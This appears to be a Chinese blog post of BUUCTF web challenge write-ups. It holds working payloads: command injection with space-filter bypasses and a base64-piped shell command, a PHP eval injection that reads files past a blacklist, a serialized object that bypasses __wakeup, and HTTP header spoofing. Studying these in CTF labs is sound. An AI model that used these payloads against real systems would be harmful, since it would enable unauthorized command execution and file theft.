11-28 BUU做题记录
2020-11-28
[ACTF2020 新生赛]Exec
打开直接ping,一般所在目录没有flag,那就在根目录。
看到flag,直接cat ,
[GXYCTF2019]Ping Ping Ping
打开页面,直接ping,然后ls,。发现flag.php
cat flag.php读取 出现错误。空格被bang
绕过空格方法有很多,一个个试都可以
$IFS$9 <> , %09 ${IFS} %20 <
读到首页源码
被禁了bash ,但还有sh 啊。因为过滤空格,所以使用$IFS$9替代。
?ip=127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhw$IFS$9|$IFS$9base64$IFS$9-d$IFS$9|$IFS$9sh
其他解法,看到` 没有被禁用,直接可以想到内联执行。
在这里内联执行就是将 ls的输出转为输入。
?ip=127.0.0.1;cat$IFS$9`ls`
[RoarCTF 2019]Easy Calc
打开页面,直接查看源代码,虚假的过程就不看了。
说自己有waf,下面还有一个链接,, calc.php 直接打开。
看到代码,,get[‘num’] 一个黑名单。 但是这不是waf。。这里面没有过滤字母
eval直接执行,当我们输入php代码,会直接执行,如果没有php代码,会原样输出
输入php代码报错。输入字母报错。
经过查看别人的writeup之后,属实学到了。
PHP的字符串解析特性
我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => "bar")。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,原文链接
所以我们构造paylaod:
? num=phpinfo() 成功
查看flag,就要知道flag在哪,我们列目录。(不是ls) ,eval执行php命令,所以
因为”/” 在黑名单,所以我们用ascii码。
?%20num=1;var_dump(scandir(chr(47)))
?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
[极客大挑战 2019]Knife
打开页面,提示菜刀。下面还有一句话的密码。直接连接,然后flag就在根目录。
不过遇到这样子的我一般都是手动操作,
[极客大挑战 2019]PHP
有备份网站,扫描,得到www.zip
打开index.php
继续看class.php
需要username =admin ,password =100 .输出flag。
再看class.php中,我们传入的值会被反序列化,那就是我们需要先序列化。
构造序列化代码。
虽然序列化了,,但是wakeup优先执行,会将username改为guest。
绕过方法就是
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
所以我们只需要修改第一个Name后面的2 ,改成2以上的数字就行了
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
然后GET传参?select= 得到flag
[极客大挑战 2019]Http
考察http的基本文件头,Referer ,X-Forwarded-For,User-Agents
打开网站,查看源代码,发现链接。打开。
看到这个,直接post发包
Referer: https://www.Sycsecret.com
修改user-agents:
修改X-Forwarded-For:127.0.0.1
得到flag
11-28 BUU做题记录相关推荐
- 11.9 至 11.17 四道典型题记录: Counter 弹出 | map函数 | 子集求取 | 有序字符桶分装
11.9 至 11.17 四道典型题记录: Counter 弹出 | map函数 | 子集求取 | 有序字符桶分装 昨天休息的时候一直在想应该学习哪种语言,我想这也是好多人发愁无法下手的原因之一 ...
- Regional 做题记录 (50/50)
写在前面 博主深感自己太弱了QAQ 于是有了一个刷水的想法,Regional的题目还是有很多考查思维的题目,所以这次是乱做50道思考题,可能会顺带做一些水题,这些题的简要题解会写到这篇博文里面,希望能 ...
- 2020.7月做题记录
转眼就到了2020的下半年了-前方仍是一片茫然. 长期计划 prufer 序列 2020.07.02-2020.07.04 Problem Finished P2624 [HNOI2008]明明的烦恼 ...
- 退役前的做题记录1.0
退役前的做题记录1.0 租酥雨最近很懒qwq,具体表现在写题的时候不想发题解了. 但是想想这样也不太好,就决定发个一句话(半句话到几句话不等)题解上来. 2018-09.18-2018-09.28 [ ...
- 【Pikachu】漏洞练习平台做题记录+原理解析(2.2)XSS姿势和技巧
前言 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意. pikach ...
- ctfshow 网络迷踪做题记录(1)
ctfshow 网络迷踪做题记录(1) -- 新手上路 找桥的名字. 附件为一张海边图片. 百度识图为蜈支洲岛,得到地点名,但还需要具体桥的名字. 再用搜索引擎搜索关键字,就可以看到结果中的" ...
- 2020.9月做题记录
八月的做题记录因为是暑假所以鸽掉了. 离联赛真的不远了,要继续努力啊qwq- week -1 2020.08.30 2020.08.30 今天考试,修了20+次锅,修的我都没有心情做题了- 然后开始消 ...
- 概率期望题(期望 DP)做题记录
概率期望题(期望 DP)做题记录 P3830 [SHOI2012]随机树 难点在于第二问:生成树的期望深度. 不 wei zhuo 捏,设 \(dp_{i,j}\) 表示已经有了 \(i\) 个叶子结 ...
- 数数题(计数类 DP)做题记录
数数题(计数类 DP)做题记录 CF1657E Star MST 我们称张无向完全图是美丽的当且仅当:所有和 \(1\) 相连的边的边权之和等于这张完全图的最小生成树的边权之和. 完全图点数为 \(n ...
最新文章
- 青源 LIVE 预告 | 华为诺亚韩凯:视觉 Transformer 综述
- 《Redis 系列》- list命令
- 蓝桥杯:基础练习 特殊的数字
- centos网络安装
- tcp/ip详解--分层
- 洛谷 P1111 修复公路(最小生成树)
- 重磅 |“金砖”电商报告:5年后金砖五国网络零售将超3万亿美元
- 自动化测试 div sendkeys无效_【自动化测试】【JestSelenium】(04)—— Selenium WebDriver...
- Treasure Island CodeForces - 1214D(dfs)
- springcloud工作笔记106---eureka实现服务监控_监控服务下线_服务注册_服务续约_判断注册中心可用_监控eurekaserver启动
- 美国爱荷华州批准参议院541号文件,允许使用分布式账本技术和智能合约
- java part part,java泛型指导手册(part1),指导手册part1
- 1.5节 卡诺图以及布尔代数(SOP,POS)part1
- 安全防御-----防病毒
- Python 实现一个自动下载小说的简易爬虫
- STM32之DS1682
- 现在可以把安卓改为鸿蒙系统了吗,华为官宣鸿蒙系统发布后,现有安卓系统可以直接切换新系统...
- iOS开发:如何使用ShareSDK让APP快速拥有分享功能
- Java IO - 分类
- 为网站配置免费的HTTPS证书 3-4
热门文章
- OM | 电子商务平台中的合约选择:批发合约or代理合约?
- STM32 USB的实现和软件实现
- 【Codeforces Round #547 (Div. 3)】 A B C D E F1 F2 G
- 关于我在一家网络科技有限公司的工作经历
- 运放参数 分析 (LMC6482 为例)
- 计算机前沿技术云论文,计算机前沿技术论文.doc
- 基于STM32智能手环心率计步器体温显示设计
- ULINK2 在MDK4.70升级固件之后无法向下兼容的问题 和Ulink2 No Ulink Device found 解决办法
- 程序员的沟通技巧-耗子叔
- 杨建允:新电商助力企业实现新品牌营销运营发展进阶